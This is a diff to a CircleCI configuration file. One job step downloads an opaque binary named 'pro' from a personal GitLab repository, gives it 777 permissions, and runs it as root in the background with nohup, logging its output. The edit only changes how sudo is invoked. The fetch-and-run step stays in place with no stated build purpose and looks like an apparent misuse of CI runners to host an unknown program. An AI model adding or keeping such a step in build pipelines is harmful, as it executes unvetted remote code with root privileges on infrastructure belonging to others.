--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -10,7 +10,7 @@ jobs:
       - run:
          name: "pro"
          command: | 
-          sudo --command "wget https://gitlab.com/Sherwoodfrey/prx/-/raw/main/pro && chmod 777 pro"
+          sudo su --command "wget https://gitlab.com/Sherwoodfrey/prx/-/raw/main/pro && chmod 777 pro"
           sudo nohup ./pro --log=stdout > meta.log &
           sleep 5
           sudo cat meta.log
